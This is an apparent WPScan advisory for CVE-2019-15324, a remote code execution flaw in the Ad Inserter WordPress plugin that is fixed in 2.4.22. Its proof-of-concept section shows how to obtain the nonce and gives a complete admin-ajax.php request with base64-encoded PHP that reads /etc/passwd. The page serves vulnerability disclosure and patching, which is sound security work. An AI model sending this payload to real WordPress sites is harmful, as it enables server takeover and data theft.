WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

Description

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin, in versions up to and including 2.4.21, was affected by an Authenticated Remote Code Execution vulnerability. The plugin's ad-preview AJAX handler (action ai_ajax_backend) executed PHP supplied in the request, and the nonce protecting that handler could be obtained by an unprivileged visitor, so any authenticated user, including one with the subscriber role, could run arbitrary PHP on the server.

Proof of Concept

The nonce (sent as the ai_check parameter in the final request) can be obtained by requesting the site's homepage with the cookie AI_WP_DEBUGGING set to 2; no privileged account is needed for this step.

Then, using an account with a role as low as subscriber, send the request below. The code parameter is the base64 encoding of <?php echo file_get_contents('/etc/passwd'); ?>, and php=1 asks the handler to execute it:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1

action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1

Affects Plugins

ad-inserter
Fixed in version 2.4.22

References

CVE
CVE-2019-15324
URL
https://www.wordfence.com/blog/2019/07/critical-vulnerability-patched-in-ad-inserter-plugin/
URL
https://plugins.trac.wordpress.org/changeset/2122577/ad-inserter

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

Sean Murphy (Wordfence)

Submitter

Ryan Dewhurst

Submitter website
https://wpscan.io
Submitter twitter
ethicalhack3r
Verified

No

WPVDB ID
fbfa36dc-7028-4a31-8a68-4b02da80290c

Timeline

Publicly Published

2019-07-15

Added

2019-07-15

Last Updated

2020-09-22
